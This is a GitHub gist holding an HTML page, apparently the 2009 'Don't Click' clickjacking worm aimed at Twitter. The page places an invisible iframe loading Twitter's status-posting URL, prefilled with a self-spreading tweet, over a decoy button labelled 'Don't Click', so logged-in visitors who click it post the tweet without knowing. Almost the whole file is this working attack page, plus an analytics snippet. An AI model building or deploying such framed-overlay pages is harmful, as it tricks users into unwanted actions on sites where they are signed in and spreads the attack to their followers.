Skip to content

Instantly share code, notes, and snippets.

@libin
Created February 12, 2009 18:00
Show Gist options
  • Save libin/62778 to your computer and use it in GitHub Desktop.
Save libin/62778 to your computer and use it in GitHub Desktop.
<!DOCTYPE html>
<html>
<head>
<title>Twitter: Don't Click</title>
<style>
iframe {
position: absolute;
width: 550px;
height: 228px;
top: -170px;
left: -400px;
z-index: 2;
opacity: 0;
filter: alpha(opacity=0);
}
button {
position: absolute;
top: 10px;
left: 10px;
z-index: 1;
width: 120px;
}
</style>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-326980-19");
pageTracker._trackPageview();
} catch(err) {}</script>
</head>
<body>
<iframe src="http://twitter.com/home?status=Don't Click: http://tinyurl.com/amgzs6" scrolling="no"></iframe>
<button>Don't Click</button>
<p style="margin-top:50px;"> </p>
<p style="margin-top:50px;"> </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
<p style="margin-top:50px;">... </p>
Source: <a href="http://tinyurl.com/bopa9l" rel="nofollow" target="_blank">Korben.Info</a>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment